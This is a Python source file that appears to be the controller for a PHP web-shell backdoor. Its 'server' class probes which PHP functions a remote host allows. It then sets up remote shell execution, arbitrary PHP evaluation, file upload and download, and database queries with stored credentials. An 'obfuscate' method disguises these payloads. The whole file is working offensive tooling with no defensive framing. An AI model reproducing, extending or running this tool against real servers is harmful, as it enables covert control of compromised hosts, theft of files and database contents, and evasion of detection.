#!/usr/bin/env python

import evaluator
import obfuscate
import codemap
import configparse
import random

class server:
	def __init__(self, config):
		self.config = config
		self.name = self.config[configparse.hostvar][configparse.namevar]

		self._initEvaluators()

	def _initEvaluators(self):
		self._initPhp()
		self._initShell()
		self._initDownload()
		self._initUpload()
		self._initSQL()

	def _initShell(self):
		for method in codemap.execCode.itervalues():
			if self.testCapabilities(method["functions"]):
				self.shell = evaluator.create_evaluator(evaluator.shell_eval, self.config, method["code"])

	def _initDownload(self):
		for method in codemap.downloadCode.itervalues():
			if self.testCapabilities(method["functions"]):
				self.download = evaluator.create_evaluator(evaluator.download_eval, self.config, method["code"])

	def _initUpload(self):
		for method in codemap.uploadCode.itervalues():
			if self.testCapabilities(method["functions"]):
				self.upload = evaluator.create_evaluator(evaluator.upload_eval, self.config, method["code"])

	def _initSQL(self):
		try:
			databasetype = self.config["database"]["type"]
			codeobj = codemap.databaseCode[databasetype]
			if self.testCapabilities(codeobj["functions"]):
				self.database = evaluator.create_evaluator(evaluator.sql_eval, self.config, codeobj["code"])
			else:
				self.database = None
		except:
			self.database = None

	def _initPhp(self):
		self.php = evaluator.create_evaluator(evaluator.php_eval, self.config)

	def obfuscate(self):
		self.shell    = obfuscate.obfuscator(self.shell)
		self.download = obfuscate.obfuscator(self.download)
		self.upload   = obfuscate.obfuscator(self.upload)
		self.php      = obfuscate.obfuscator(self.php)

	def testCapabilities(self, functions):
		result = True
		tolookup = []
		# search for caps in config
		yes = "enabled"
		no  = "disabled"
		for function in functions:
			try:
				if self.config["capabilities"][function] == no:
					result = False
			except KeyError:
				tolookup.append(function)
		# ask for unknown function states
		if len(tolookup):
			delimeter = ","
			request = delimeter.join(tolookup)
			code = codemap.testCode["capability_test"]["code"].code(request, delimeter)
			enabled_functions = set(self.phpExec(code).read().split(","))
			for function in enabled_functions:
				self.config["capabilities"][function] = yes
			for function in (set(tolookup)-enabled_functions):
				self.config["capabilities"][function] = no
				result = False
		return result

	def getConfig(self):
		return self.config

	def shellExec(self, command):
		return self.shell.eval(command)

	def phpExec(self, code):
		return self.php.eval(code)

	def fileUpload(self, remote_file, local_file):
		return self.upload.eval(remote_file, local_file)

	def fileDownload(self, remote_file, local_file, reporthook = None):
		return self.download.eval(remote_file, local_file, reporthook)

	def querySQL(self, query):
		user   = self.config["database"]["user"]
		pw     = self.config["database"]["pass"]
		host   = self.config["database"]["host"]
		dbname = self.config["database"]["dbname"]
		return self.database.eval(user, pw, dbname, query, host)

	def save(self):
		self.config.save()
